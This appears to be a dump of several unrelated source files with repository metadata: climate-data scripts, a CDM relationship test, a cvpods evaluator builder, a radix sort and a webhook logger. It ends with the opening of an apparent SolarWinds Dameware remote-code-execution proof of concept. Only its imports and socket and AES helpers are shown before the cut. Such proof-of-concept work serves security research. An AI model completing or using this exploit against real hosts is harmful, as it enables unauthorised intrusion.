            filt1_min = list(map(add, filt1_max, aOnefilt1)) #
            filt2_min = list(map(add, filt2_max, aOnefilt2))
            filt3_min = list(map(add, filt3_max, aOnefilt3))
            # Interleave max/min indices so columns stay paired.
            filt1Tot = []
            for i in range(len(filt1_max)):
                filt1Tot.append(filt1_max[i])
                filt1Tot.append(filt1_min[i])
            filt2Tot = []
            for j in range(len(filt2_max)):
                filt2Tot.append(filt2_max[j])
                filt2Tot.append(filt2_min[j])
            filt3Tot = []
            for k in range(len(filt3_max)):
                filt3Tot.append(filt3_max[k])
                filt3Tot.append(filt3_min[k])
            dftmpRCP26 = dftmp[dftmp.columns[filt1Tot]]
            dftmpRCP45 = dftmp[dftmp.columns[filt2Tot]]
            dftmpRCP85 = dftmp[dftmp.columns[filt3Tot]]
            dftmpRCP26_n = random_tmp (dftmpRCP26, 1981, 2099, 12, '26_', Xfactor1)
            dftmpRCP45_n = random_tmp (dftmpRCP45, 1981, 2099, 25, '45_', Xfactor1)
            dftmpRCP85_n = random_tmp (dftmpRCP85, 1981, 2099, 31, '85_', Xfactor1)
            result = pd.concat([dftmpRCP26_n, dftmpRCP45_n, dftmpRCP85_n], axis=1, sort=False)
            #ewName = 'n'+f
            #ilepath = os.path.join(os.environ.get('HOME'), newName)
            #esult.to_csv(filepath, index = False)
            #newName = 'n_'+ f
            newName = f
            #filepath = os.path.join(os.getcwd(), newName)
            #outfolder =os.path.join(os.getcwd(), 'Outputs_randomness')
            outfolder =os.path.join(os.getcwd()) # we want the results to be over written
            filepath = os.path.join(outfolder, newName)
            result.to_csv(filepath, index = False)
            print('End of writing tmp files')
        else :
            pass
## Step 2: Function for initiating the main dictionary of climate stations
def create_dic(a):
    """Return a fresh parameter dictionary for one climate station.

    Every station attribute (melt factor, potential radiation, snow
    parameters, precipitation correction, location, file name) starts out as
    None and is filled in later by ``initialize_input_dict``.

    a -- accepted for backward compatibility with existing callers (they pass
         the station name) but unused: the original implementation immediately
         overwrote it with a new dictionary.
    Returns: dict mapping each parameter key to None.
    """
    keys = ['fM', 'iPot', 'rSnow', 'dSnow', 'cPrec', 'dP', 'elev', 'lat',
            'long', 'fileName']
    # dict.fromkeys defaults every value to None, matching the original
    # {key: None for key in keys} comprehension without the dead assignments.
    return dict.fromkeys(keys)
def initialize_input_dict (mainFolderSki):
    ''' This function returns a dictionary , and addresses of 4 folders'''
    # Reads the Ablation / Accumulation / Climate_ref input folders under
    # ``mainFolderSki`` and builds one parameter dictionary per climate
    # station, populated with melt/accumulation factors and coordinates.
    # Side effects: changes the process working directory (os.chdir) three
    # times and leaves it inside the climate reference folder.
    '''Step 1'''
    rootFolder = mainFolderSki
    inputFolder = os.path.join(rootFolder,'input')
    ablationFolder = os.path.join(inputFolder, 'Ablation')
    accumulationFolder = os.path.join(inputFolder, 'Accumulation')
    climate_ref_Folder = os.path.join(inputFolder, 'Climate_ref')
    climate_Ref_Folder_org = os.path.join(inputFolder, 'Climate_ref_no_randomness_0')
    climate_ref_Folder_rand_1 = os.path.join(inputFolder, 'Climate_ref_randomness_1')
    climate_ref_Folder_rand_2 = os.path.join(inputFolder, 'Climate_ref_randomness_2')
    '''Step 2: Reading all files names inside the Ablation, Accumulation, and Climate folders'''
    # NOTE(review): each os.walk loop keeps only the file list of the LAST
    # directory visited -- fine for flat folders, wrong if subfolders exist.
    ablationFiles = []
    for filename in os.walk(ablationFolder):
        ablationFiles = filename[2]
    accumulationFiles = list()
    for filename in os.walk(accumulationFolder):
        accumulationFiles = filename[2]
    climate_ref_Files = list()
    for filename in os.walk(climate_ref_Folder):
        climate_ref_Files = filename[2]
    '''Step 3: Reading files inside ablation folder '''
    # NOTE(review): files are addressed by position ([0]=FM, [1]=Ipot,
    # [2]=Rsnow) -- this assumes a fixed, sorted naming scheme; verify.
    os.chdir(ablationFolder)
    with open(ablationFiles[0], 'r') as file:
        FM1 = file.read()
    with open(ablationFiles[1], 'r') as file:
        Ipot1 = file.read()
    with open(ablationFiles[2], 'r') as file:
        Rsnow1 = file.read()
    '''Step 4: Reading the lines of files inside ablation folder'''
    # Normalise newlines to tabs so each file becomes a flat token list of
    # alternating station-name / value entries.
    FM1 = FM1.replace('\n', '\t')
    FM1 = FM1.split('\t')
    Ipot1 = Ipot1.replace('\n', '\t').split('\t')
    Rsnow1 = Rsnow1.replace('\n', '\t').split('\t')
    '''Step 5: Reading the lines of files inside accumulation folder'''
    os.chdir(accumulationFolder)
    with open(accumulationFiles[0], 'r') as file:
        cPrec = file.read()
    with open(accumulationFiles[1], 'r') as file:
        dSnow1 = file.read()
    cPrec = cPrec.replace('\n', '\t')
    cPrec = cPrec.split('\t')
    dSnow1 = dSnow1.replace('\n', '\t').split('\t')
    '''Step 6: Reading the lines of files inside climate folder'''
    os.chdir(climate_ref_Folder)
    with open('pcp.txt', 'r') as file:
        pcpData = file.read()
    with open('tmp.txt', 'r') as file:
        tmpData = file.read()
    pcpData = pcpData.split('\n')
    for i in range(len(pcpData)):
        pcpData[i] = pcpData[i].split(',')
    '''Step 7: Initialazing the input dictionary of climate stations which holds the information of accumulation
    and ablation, and etc of the stations'''
    # Station names are derived from the precipitation csv file names; the
    # slice [-25:-5] assumes the fixed "<lat>_<long>p.csv" naming convention.
    nameStn = []
    for file in climate_ref_Files:
        if 'p.csv' in file:
            #nameStn.append('n_' + file[-25: -5])
            nameStn.append(file[-25: -5])
    stnDicts = []
    for i in range(len(nameStn)):
        stnDicts.append(create_dic(nameStn[i]))
    '''Step 8: Assigning the file names to the dictionary'''
    for i in range (len(nameStn)):
        stnDicts[i]['fileName'] = nameStn[i]
    '''Step 9: Assigning the accumulation and ablation values'''
    # Each token list alternates name/value, so the value follows the matched
    # station name at index i+1.
    for stnDict in stnDicts:
        for i, element in enumerate(FM1):
            if element == stnDict['fileName'][:]:
                #if element == stnDict['fileName'][2:]:
                stnDict['fM'] = FM1[i+1]
        for i, element in enumerate(Ipot1):
            if element == stnDict['fileName'][:]:
                #if element == stnDict['fileName'][2:]:
                stnDict['iPot'] = Ipot1[i+1]
        for i, element in enumerate(Rsnow1):
            if element == stnDict['fileName'][:]:
                #if element == stnDict['fileName'][2:]:
                stnDict['rSnow'] = Rsnow1[i+1]
        for i, element in enumerate(dSnow1):
            if element == stnDict['fileName'][:]:
                #if element == stnDict['fileName'][2:]:
                stnDict['dSnow'] = dSnow1[i+1]
        # NOTE(review): cPrec/dP are read from fixed positions (1 and 3) and
        # are identical for all stations; the loop over cPrec is redundant.
        for i, element in enumerate(cPrec):
            stnDict['cPrec'] = cPrec[1]
            stnDict['dP'] = cPrec[3]
    '''Step 10: Assigning the elevation, Lat and long to the dictionaries'''
    for i in range(len(stnDicts)):
        for j in range(1, len(pcpData)):
            #if pcpData[j][1][2:-1] == stnDicts[i]['fileName'][2:]:
            if pcpData[j][1][:-1] == stnDicts[i]['fileName'][:]:
                stnDicts[i]['lat']= pcpData[j][2]
                stnDicts[i]['long']= pcpData[j][3]
                stnDicts[i]['elev']= pcpData[j][4]
    return stnDicts, inputFolder, ablationFolder, accumulationFolder, climate_ref_Folder, climate_Ref_Folder_org, \
        climate_ref_Folder_rand_1, climate_ref_Folder_rand_2
#### S3.1 *Initializiing the main dictionary for a case study*
# Module-level driver: set up the case-study folders, then randomise every
# station's pcp/tmp files.  Runs at import time.
caseStudyStns = {}
inputFolder = ''
ablationFolder = ''
accumulationFolder = ''
climateFolder = ''
climateFolder_org = ''
climateFolder1 = ''
climateFolder2 = ''
# Earlier case-study roots kept for reference:
#root = 'C:/Users/ashrafse/SA_2/snowModelUZH/case2_Atzmaening'
#root = 'C:/Users/ashrafse/SA_2/snowModelUZH/case6_davos_elevations'
#root = r'C:\Saeid\Prj100\SA_2\snowModelUZH\case6_davos_elevations_b2584'
root = r'C:\Saeid\Prj100\SA_2\snowModelUZH\case3_hoch-ybrig_v3_2'
## calling the function with multiple return values
caseStudyStns, inputFolder, ablationFolder, accumulationFolder, climateFolder, climateFolder_org, \
    climateFolder1, climateFolder2 = initialize_input_dict(root)
# initialize_input_dict leaves the cwd inside Climate_ref; chdir again to be
# explicit before listing and overwriting the station files.
os.chdir(climateFolder)
fnames = os.listdir()
# 4 = Xfactor1: number of shuffle passes per simulated year.
randomness_pcp_tmp(fnames, 4)
| 34.6 | 115 | 0.58426 |
632e9146655ceead20c4319ea2840b8bd286e48d | 66 | py | Python | bminf/models/__init__.py | AdamBear/BMInf | 8e650dc30e3ed9d7d628153b0a4dbd76d97ea948 | [
"Apache-2.0"
] | 206 | 2021-09-23T08:55:29.000Z | 2022-03-26T13:15:41.000Z | bminf/models/__init__.py | AdamBear/BMInf | 8e650dc30e3ed9d7d628153b0a4dbd76d97ea948 | [
"Apache-2.0"
] | 24 | 2021-09-24T05:54:39.000Z | 2022-03-25T01:44:49.000Z | bminf/models/__init__.py | AdamBear/BMInf | 8e650dc30e3ed9d7d628153b0a4dbd76d97ea948 | [
"Apache-2.0"
] | 34 | 2021-09-26T02:17:29.000Z | 2022-03-28T07:01:54.000Z | from .cpm1 import CPM1
from .cpm2 import CPM2
from .eva import EVA | 22 | 22 | 0.787879 |
feb5f5d3c1df79f2c4a7eeb584993486f2c849fa | 10,891 | py | Python | objectModel/Python/tests/cdm/relationship/test_calculate_relationship.py | Venkata1920/CDM | 680c798f2787fb064410f4a0a5dcb225049e79f6 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | objectModel/Python/tests/cdm/relationship/test_calculate_relationship.py | Venkata1920/CDM | 680c798f2787fb064410f4a0a5dcb225049e79f6 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | objectModel/Python/tests/cdm/relationship/test_calculate_relationship.py | Venkata1920/CDM | 680c798f2787fb064410f4a0a5dcb225049e79f6 | [
"CC-BY-4.0",
"MIT"
] | null | null | null | # Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
import os
import unittest
from cdm.objectmodel import CdmEntityDefinition, CdmCorpusDefinition, CdmE2ERelationship, CdmCollection
from tests.cdm.projection.attribute_context_util import AttributeContextUtil
from tests.common import async_test, TestHelper
from tests.utilities.projection_test_utils import ProjectionTestUtils
class CalculateRelationshipTest(unittest.TestCase):
    """Test to validate calculate_entity_graph_async function"""

    # The path between TestDataPath and TestName.
    tests_subpath = os.path.join('Cdm', 'Relationship', 'TestCalculateRelationship')

    @async_test
    async def test_simple_with_id(self):
        """Non projection scenario with the referenced entity having a primary key"""
        test_name = 'test_simple_with_id'
        entity_name = 'Sales'
        await self._test_run(test_name, entity_name, False)

    @async_test
    async def test_without_id_proj(self):
        """Projection scenario with the referenced entity not having any primary key"""
        test_name = 'test_without_id_proj'
        entity_name = 'Sales'
        await self._test_run(test_name, entity_name, True)

    @async_test
    async def test_diff_ref_location(self):
        """Projection scenario with the referenced entity in a different folder"""
        # BUG FIX: the method was misspelled 'test_diff_ref_loation';
        # renamed to match its test_name and the test-data folder.
        test_name = 'test_diff_ref_location'
        entity_name = 'Sales'
        await self._test_run(test_name, entity_name, True)

    @async_test
    async def test_composite_proj(self):
        """Projection with composite keys"""
        test_name = 'test_composite_proj'
        entity_name = 'Sales'
        await self._test_run(test_name, entity_name, True)

    @async_test
    async def test_nested_composite_proj(self):
        """Projection with nested composite keys"""
        test_name = 'test_nested_composite_proj'
        entity_name = 'Sales'
        await self._test_run(test_name, entity_name, True)

    @async_test
    async def test_polymorphic_without_proj(self):
        """Non projection scenario with selectsSubAttribute set to one"""
        test_name = 'test_polymorphic_without_proj'
        entity_name = 'CustomPerson'
        await self._test_run(test_name, entity_name, False)

    @async_test
    async def test_polymorphic_proj(self):
        """Projection with IsPolymorphicSource property set to true"""
        test_name = 'test_polymorphic_proj'
        entity_name = 'Person'
        await self._test_run(test_name, entity_name, True)

    @async_test
    async def test_composite_key_polymorphic_relationship(self):
        """Test a composite key relationship with a polymorphic entity."""
        test_name = 'test_composite_key_polymorphic_relationship'
        entity_name = 'Person'
        await self._test_run(test_name, entity_name, True)

    @async_test
    async def test_composite_key_non_polymorphic_relationship(self):
        """Test a composite key relationship with multiple entity attribute but not polymorphic."""
        # BUG FIX: this method previously re-used the name
        # test_composite_key_polymorphic_relationship, silently shadowing the
        # test above so it never ran; renamed to match its test_name.
        test_name = 'test_composite_key_non_polymorphic_relationship'
        entity_name = 'Person'
        await self._test_run(test_name, entity_name, True)

    async def _test_run(self, test_name: str, entity_name: str, is_entity_set: bool) -> None:
        """Common test code for these test cases.

        Resolves the entity, compares its attribute context against the
        expected snapshot, recomputes the relationship graph, compares the
        relationship listing, and finally round-trips the manifest through
        save/load to verify the persisted relationships.
        """
        corpus = TestHelper.get_local_corpus(self.tests_subpath, test_name)
        expected_output_folder = TestHelper.get_expected_output_folder_path(self.tests_subpath, test_name)
        actual_output_folder = TestHelper.get_actual_output_folder_path(self.tests_subpath, test_name)

        if not os.path.exists(actual_output_folder):
            os.makedirs(actual_output_folder)

        manifest = await corpus.fetch_object_async('local:/default.manifest.cdm.json')
        self.assertIsNotNone(manifest)
        entity = await corpus.fetch_object_async('local:/{}.cdm.json/{}'.format(entity_name, entity_name), manifest)
        self.assertIsNotNone(entity)
        resolved_entity = await ProjectionTestUtils.get_resolved_entity(corpus, entity, ['referenceOnly'])
        self._assert_entity_shape_in_resolved_entity(resolved_entity, is_entity_set)

        # Attribute context snapshot comparison.
        actual_attr_ctx = self._get_attribute_context_string(resolved_entity, entity_name, actual_output_folder)
        with open(os.path.join(expected_output_folder, 'AttrCtx_{}.txt'.format(entity_name))) as expected_file:
            expected_attr_ctx = expected_file.read()
        self.assertEqual(expected_attr_ctx, actual_attr_ctx)

        # Relationship graph snapshot comparison.
        await corpus.calculate_entity_graph_async(manifest)
        await manifest.populate_manifest_relationships_async()
        actual_relationships_string = self._list_relationships(corpus, entity, actual_output_folder, entity_name)
        relationships_filename = 'REL_{}.txt'.format(entity_name)
        with open(os.path.join(actual_output_folder, relationships_filename), 'w') as actual_file:
            actual_file.write(actual_relationships_string)
        with open(os.path.join(expected_output_folder, relationships_filename)) as expected_file:
            expected_relationships_string = expected_file.read()
        self.assertEqual(expected_relationships_string, actual_relationships_string)

        # Round-trip the manifest and verify the persisted relationships.
        output_folder = corpus.storage.fetch_root_folder('output')
        output_folder.documents.append(manifest)
        manifest_file_name = 'saved.manifest.cdm.json'
        await manifest.save_as_async(manifest_file_name, True)
        actual_manifest_path = os.path.join(actual_output_folder, manifest_file_name)
        if not os.path.exists(actual_manifest_path):
            self.fail('Unable to save manifest with relationship')
        else:
            saved_manifest = await corpus.fetch_object_async('output:/{}'.format(manifest_file_name))
            actual_saved_manifest_rel = self._get_relationship_strings(saved_manifest.relationships)
            manifest_relationships_filename = 'MANIFEST_REL_{}.txt'.format(entity_name)
            with open(os.path.join(actual_output_folder, manifest_relationships_filename), 'w') as actual_file:
                actual_file.write(actual_saved_manifest_rel)
            with open(os.path.join(expected_output_folder, manifest_relationships_filename)) as expected_file:
                expected_saved_manifest_rel = expected_file.read()
            self.assertEqual(expected_saved_manifest_rel, actual_saved_manifest_rel)

    def _assert_entity_shape_in_resolved_entity(self, resolved_entity: 'CdmEntityDefinition', is_entity_set: bool) -> None:
        """Assert the linked-entity trait's entity shape matches the scenario kind."""
        for att in resolved_entity.attributes:
            for trait in att.applied_traits:
                if trait.named_reference == 'is.linkedEntity.identifier' and len(trait.arguments) > 0:
                    const_ent = trait.arguments[0].value.fetch_object_definition()
                    if const_ent and const_ent.entity_shape:
                        entity_shape = const_ent.entity_shape.named_reference
                        self.assertEqual('entitySet', entity_shape) if is_entity_set else self.assertEqual('entityGroupSet', entity_shape)
                        return
        self.fail('Unable to find entity shape from resolved model.')

    def _get_relationship_strings(self, relationships: 'CdmCollection[CdmE2ERelationship]') -> str:
        """Get a string version of the relationship collection"""
        bldr = ''
        for rel in relationships:
            bldr += '{}|{}|{}|{}|{}'.format(rel.relationship_name if rel.relationship_name else '', rel.to_entity,
                                            rel.to_entity_attribute, rel.from_entity, rel.from_entity_attribute)
            bldr += '\n'
        return bldr

    def _get_relationship_string(self, rel: 'CdmE2ERelationship') -> str:
        """Get a string version of a single relationship (used as a dedup cache key)."""
        name_and_pipe = ''
        if rel.relationship_name:
            name_and_pipe = rel.relationship_name + '|'
        return '{}{}|{}|{}|{}\n'.format(name_and_pipe, rel.to_entity,
                                        rel.to_entity_attribute, rel.from_entity, rel.from_entity_attribute)

    def _list_relationships(self, corpus: 'CdmCorpusDefinition', entity: 'CdmEntityDefinition', actual_output_folder: str, entity_name: str) -> str:
        """List the incoming and outgoing relationships"""
        bldr = ''
        rel_cache = set()

        bldr += 'Incoming Relationships For: {}:\n'.format(entity.entity_name)
        # Loop through all the relationships where other entities point to this entity.
        for relationship in corpus.fetch_incoming_relationships(entity):
            cache_key = self._get_relationship_string(relationship)
            if cache_key not in rel_cache:
                bldr += self._print_relationship(relationship)
                rel_cache.add(cache_key)

        print('Outgoing Relationships For: {}:'.format(entity.entity_name))
        # Now loop through all the relationships where this entity points to other entities.
        for relationship in corpus.fetch_outgoing_relationships(entity):
            cache_key = self._get_relationship_string(relationship)
            if cache_key not in rel_cache:
                bldr += self._print_relationship(relationship) + '\n'
                rel_cache.add(cache_key)
        return bldr

    def _print_relationship(self, relationship: 'CdmE2ERelationship') -> str:
        """Format one relationship (name, endpoints, exhibited traits); also prints it."""
        bldr = ''
        if relationship.relationship_name:
            bldr += '  Name: {}\n'.format(relationship.relationship_name)
        bldr += '  FromEntity: {}\n'.format(relationship.from_entity)
        bldr += '  FromEntityAttribute: {}\n'.format(relationship.from_entity_attribute)
        bldr += '  ToEntity: {}\n'.format(relationship.to_entity)
        bldr += '  ToEntityAttribute: {}\n'.format(relationship.to_entity_attribute)
        if relationship.exhibits_traits:
            bldr += '  ExhibitsTraits:\n'
            # Deterministic order so snapshot files are stable.
            order_applied_traits = sorted(relationship.exhibits_traits, key=lambda x: x.named_reference)
            for trait in order_applied_traits:
                bldr += '  {}\n'.format(trait.named_reference)
                for args in trait.arguments:
                    attr_ctx_util = AttributeContextUtil()
                    bldr += '  {}\n'.format(attr_ctx_util.get_argument_values_as_strings(args))
        bldr += '\n'
        print(bldr)
        return bldr

    def _get_attribute_context_string(self, resolved_entity: 'CdmEntityDefinition', entity_name: str, actual_output_folder: str) -> str:
        """Check the attribute context for these test scenarios"""
        return (AttributeContextUtil()).get_attribute_context_strings(resolved_entity)
| 48.620536 | 148 | 0.696263 |
2820fdc8a72435d8f3016077ab2199900e4b371e | 3,534 | py | Python | cvpods/evaluation/build.py | hanqiu-hq/cvpods | 597fa669151fdad87c250fa118a9e3a555f4fb5e | [
"Apache-2.0"
] | null | null | null | cvpods/evaluation/build.py | hanqiu-hq/cvpods | 597fa669151fdad87c250fa118a9e3a555f4fb5e | [
"Apache-2.0"
] | null | null | null | cvpods/evaluation/build.py | hanqiu-hq/cvpods | 597fa669151fdad87c250fa118a9e3a555f4fb5e | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python3
# -*- coding: utf-8 -*-
# Copyright (C) 2019-2021 Megvii Inc. All rights reserved.
import os
import torch
from cvpods.utils import comm
from .evaluator import DatasetEvaluators
from .registry import EVALUATOR
def build_evaluator(cfg, dataset_name, dataset, output_folder=None, dump=False):
    """
    Create evaluator(s) for a given dataset.
    This uses the special metadata "evaluator_type" associated with each builtin dataset.
    For your own dataset, you can simply create an evaluator manually in your
    script and do not have to worry about the hacky if-else logic here.
    """
    # Default the output folder to <OUTPUT_DIR>/inference.
    if output_folder is None:
        output_folder = os.path.join(cfg.OUTPUT_DIR, "inference")
    evaluator_list = []
    meta = dataset.meta
    evaluator_type = meta.evaluator_type
    # Pixel-level evaluator for semantic / panoptic segmentation datasets.
    if evaluator_type in ["sem_seg", "coco_panoptic_seg"]:
        evaluator_list.append(
            EVALUATOR.get("SemSegEvaluator")(
                dataset_name,
                dataset,
                distributed=True,
                num_classes=cfg.MODEL.SEM_SEG_HEAD.NUM_CLASSES,
                ignore_label=cfg.MODEL.SEM_SEG_HEAD.IGNORE_VALUE,
                output_dir=output_folder,
                dump=dump,
            )
        )
    if evaluator_type in ["coco", "coco_panoptic_seg", "citypersons"]:
        evaluator_list.append(
            EVALUATOR.get("COCOEvaluator")(dataset_name, meta, cfg, True, output_folder, dump)
        )
    # NOTE(review): the following is a single if/elif chain -- cityscapes,
    # pascal_voc and lvis return immediately and ignore evaluator_list.
    if evaluator_type == "coco_panoptic_seg":
        evaluator_list.append(
            EVALUATOR.get("COCOPanopticEvaluator")(dataset_name, meta, output_folder, dump))
    elif evaluator_type == "cityscapes":
        assert (
            torch.cuda.device_count() >= comm.get_rank()
        ), "CityscapesEvaluator currently do not work with multiple machines."
        return EVALUATOR.get("CityscapesEvaluator")(dataset_name, meta, dump)
    elif evaluator_type == "pascal_voc":
        return EVALUATOR.get("PascalVOCDetectionEvaluator")(dataset_name, meta, dump)
    elif evaluator_type == "lvis":
        return EVALUATOR.get("LVISEvaluator")(dataset_name, meta, cfg, True, output_folder, dump)
    elif evaluator_type == "citypersons":
        # NOTE(review): "citypersons" therefore collects both COCOEvaluator
        # (appended above) and CityPersonsEvaluator -- confirm the double
        # registration is intended.
        evaluator_list.append(
            EVALUATOR.get("CityPersonsEvaluator")(
                dataset_name, meta, cfg, True, output_folder, dump)
        )
    # NOTE(review): these branches also return immediately and discard any
    # evaluators already accumulated in evaluator_list.
    if evaluator_type == "crowdhuman":
        return EVALUATOR.get("CrowdHumanEvaluator")(
            dataset_name, meta, cfg, True, output_folder, dump
        )
    elif evaluator_type == "widerface":
        return EVALUATOR.get("WiderFaceEvaluator")(
            dataset_name, meta, cfg, True, output_folder, dump)
    if evaluator_type == "classification":
        return EVALUATOR.get("ClassificationEvaluator")(
            dataset_name, meta, cfg, True, output_folder, dump)
    if evaluator_type == "longtailclassification":
        return EVALUATOR.get("LongTailClassificationEvaluator")(
            dataset_name, meta, cfg, True, output_folder, dump
        )
    # Extra evaluator classes may be supplied directly on the config object.
    if hasattr(cfg, "EVALUATORS"):
        for evaluator in cfg.EVALUATORS:
            evaluator_list.append(evaluator(dataset_name, meta, True, output_folder, dump=True))
    if len(evaluator_list) == 0:
        raise NotImplementedError(
            "no Evaluator for the dataset {} with the type {}".format(
                dataset_name, evaluator_type
            )
        )
    elif len(evaluator_list) == 1:
        return evaluator_list[0]
    # Multiple evaluators are wrapped so they run as one.
    return DatasetEvaluators(evaluator_list)
| 38.413043 | 97 | 0.65648 |
9ee73932d2e25761ba1385f35540410cf312bc41 | 929 | py | Python | co/edu/unbosque/model/AG_Radix.py | cdsanchezm/Algoritmos-de-ordenamiento | 0790487931778888975d89d30127e6cf2ec9d3c0 | [
"MIT"
] | null | null | null | co/edu/unbosque/model/AG_Radix.py | cdsanchezm/Algoritmos-de-ordenamiento | 0790487931778888975d89d30127e6cf2ec9d3c0 | [
"MIT"
] | null | null | null | co/edu/unbosque/model/AG_Radix.py | cdsanchezm/Algoritmos-de-ordenamiento | 0790487931778888975d89d30127e6cf2ec9d3c0 | [
"MIT"
] | null | null | null | import random
def radix(totalNumbers, numbers):
    """LSD radix-sort ``numbers`` in place using base ``totalNumbers``.

    ``totalNumbers`` doubles as the digit base and the bucket count, so any
    value >= 2 works; it does not have to equal len(numbers).  Only
    non-negative integers are supported (Python's modulo on negatives would
    scatter them into the wrong buckets).

    totalNumbers -- radix base / number of buckets (>= 2)
    numbers      -- list of non-negative ints, sorted in place
    """
    maxLen = False
    tmp = -1
    location = 1  # current digit weight: totalNumbers ** pass
    while not maxLen:
        maxLen = True
        baskets = [list() for _ in range(totalNumbers)]
        for i in numbers:
            # BUG FIX: was int(i / location) -- the float round-trip loses
            # precision for large ints; floor division stays exact.
            tmp = i // location
            baskets[tmp % totalNumbers].append(i)
            if maxLen and tmp > 0:
                # Some number still has digits at this weight: another pass.
                maxLen = False
        # Stable rebuild of ``numbers`` from the buckets, in bucket order.
        a = 0
        for b in range(totalNumbers):
            basket = baskets[b]
            for i in basket:
                numbers[a] = i
                a += 1
        location *= totalNumbers
    print("baskets", baskets)  # debug output kept from the original
def menu(totalNumbers, numbers, option):
    """Fill ``numbers`` with ``totalNumbers`` integers.

    option 1 -- prompt the user for each value
    option 2 -- draw uniform random ints in [0, 10000]
    Any other option leaves ``numbers`` untouched.
    """
    if option == 1:
        for _ in range(totalNumbers):
            numbers.append(int(input("enter data")))
    if option == 2:
        for _ in range(totalNumbers):
            numbers.append(random.randint(0, 10000))
| 23.820513 | 55 | 0.514532 |
00442b80500b8be20dded0c0dbc3f3321d7eacbe | 1,508 | py | Python | minio-python-sdk/webhook-server.py | minio/training | 60c2a4fc57b7bad116f8d6037482050ef138bee1 | [
"CC-BY-4.0"
] | null | null | null | minio-python-sdk/webhook-server.py | minio/training | 60c2a4fc57b7bad116f8d6037482050ef138bee1 | [
"CC-BY-4.0"
] | null | null | null | minio-python-sdk/webhook-server.py | minio/training | 60c2a4fc57b7bad116f8d6037482050ef138bee1 | [
"CC-BY-4.0"
] | null | null | null | #!/usr/bin/env python3
"""
Very simple HTTP server in python for logging requests
Usage::
./server.py [<port>]
"""
from http.server import BaseHTTPRequestHandler, HTTPServer
import json
import logging
class WebHookServer(BaseHTTPRequestHandler):
    """HTTP request handler that logs incoming webhook POST bodies as JSON."""
    def _set_response(self):
        # Acknowledge every request with 200 OK and an HTML content type.
        self.send_response(200)
        self.send_header('Content-type', 'text/html')
        self.end_headers()

    def do_POST(self):
        # Logs the request path, headers and pretty-printed JSON body, then
        # echoes a short confirmation back to the client.
        content_length = int(self.headers['Content-Length']) # <--- Gets the size of data
        post_data = self.rfile.read(content_length) # <--- Gets the data itself
        json_data = json.dumps(json.loads(post_data.decode('utf-8')),indent=4) # <---- pretty formats the data
        logging.info("POST request,\nPath: %s\nHeaders:\n%s\n\nBody:\n%s\n",
                str(self.path), str(self.headers), json_data)

        self._set_response()
        self.wfile.write("POST request for {}".format(self.path).encode('utf-8'))
def run(server_class=HTTPServer, handler_class=WebHookServer, port=4222):
    """Bind an HTTP server on all interfaces and serve until Ctrl-C."""
    logging.basicConfig(level=logging.INFO)
    httpd = server_class(('', port), handler_class)
    logging.info('Starting httpd...Listening on %s for all interfaces', port)
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    logging.info('Stopping httpd...\n')
if __name__ == '__main__':
    from sys import argv
    # An optional single CLI argument overrides the default port (4222).
    if len(argv) == 2:
        run(port=int(argv[1]))
    else:
        run()
| 32.782609 | 110 | 0.664456 |
ab75ed5e056631a86413bf4cfdd92060463f816c | 11,776 | py | Python | Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py | iamarkaj/poc | 983dcf94577b1a041f304c8e0537b670c0c18655 | [
"BSD-3-Clause"
] | 1,007 | 2018-09-17T16:13:26.000Z | 2022-03-29T00:19:42.000Z | Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py | demirelcan/poc | 201ea88410c7a9e684f6cb66118c46b3ee02bd5b | [
"BSD-3-Clause"
] | 5 | 2018-11-11T09:54:27.000Z | 2020-06-24T22:59:49.000Z | Solarwinds/Dameware/dwrcs_dwDrvInst_rce.py | demirelcan/poc | 201ea88410c7a9e684f6cb66118c46b3ee02bd5b | [
"BSD-3-Clause"
] | 325 | 2018-09-18T04:44:53.000Z | 2022-03-30T18:08:13.000Z | import sys, socket, os,string, binascii, argparse
from struct import *
from Crypto.Cipher import AES
from Crypto.Hash import HMAC,SHA512
from Crypto.Protocol import KDF
from Crypto.Signature import PKCS1_v1_5
from Crypto.PublicKey import RSA
# Got it from the Internet
def hexdump(src, length=16):
    """Format ``src`` as a classic hex dump: offset, hex bytes, ASCII column.

    NOTE(review): Python 2 only -- relies on ``xrange``, ``string.letters``
    and on iterating ``src`` as one-character strings.
    """
    # Printable characters are shown as-is; everything else becomes '.'.
    DISPLAY = string.digits + string.letters + string.punctuation
    FILTER = ''.join(((x if x in DISPLAY else '.') for x in map(chr, range(256))))
    lines = []
    for c in xrange(0, len(src), length):
        chars = src[c:c+length]
        hex = ' '.join(["%02x" % ord(x) for x in chars])
        if len(hex) > 24:
            # Insert an extra gap after the first 8 bytes for readability.
            hex = "%s %s" % (hex[:24], hex[24:])
        printable = ''.join(["%s" % FILTER[ord(x)] for x in chars])
        lines.append("%08x:  %-*s  %s\n" % (c, length*3, hex, printable))
    return ''.join(lines)
def dump(title, data):
    """Print a titled hex dump of ``data`` (Python 2 print syntax)."""
    print '--- [ %s ] --- ' % (title)
    print hexdump(data)
def recvall(sock, n):
    """Read exactly ``n`` characters from ``sock``.

    Returns the accumulated data, or None if the peer closes the connection
    before ``n`` characters arrive.
    """
    buf = ''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            # Connection closed early: signal the short read to the caller.
            return None
        buf += chunk
    return buf
def xrecv(sock):
    """Receive one framed protocol message from ``sock``.

    The wire format is a 0xc-byte little-endian header (type, unk, size)
    optionally followed by ``size`` payload bytes; header and payload are
    returned concatenated.
    """
    # Read 0xc-byte header
    header = recvall(sock, 0xc)
    # Parse header
    (msg_type, unk, size) = unpack('<III', header)
    # Append the payload when the header announces one.
    if size:
        return header + recvall(sock, size)
    return header
def aes_cbc_encrypt(data,key,iv):
    """AES-CBC encrypt ``data`` with ``key``/``iv`` (input must be block-aligned)."""
    return AES.new(key, AES.MODE_CBC, iv).encrypt(data)
def aes_cbc_decrypt(data,key,iv):
    """AES-CBC decrypt ``data`` with ``key``/``iv`` (input must be block-aligned)."""
    return AES.new(key, AES.MODE_CBC, iv).decrypt(data)
def int2bin(i):
    """Return the big-endian byte representation of a non-negative integer.

    The hex string is left-padded to an even length so unhexlify gets whole
    bytes; no extra leading zero bytes are added beyond that.
    """
    hexstr = '%x' % i
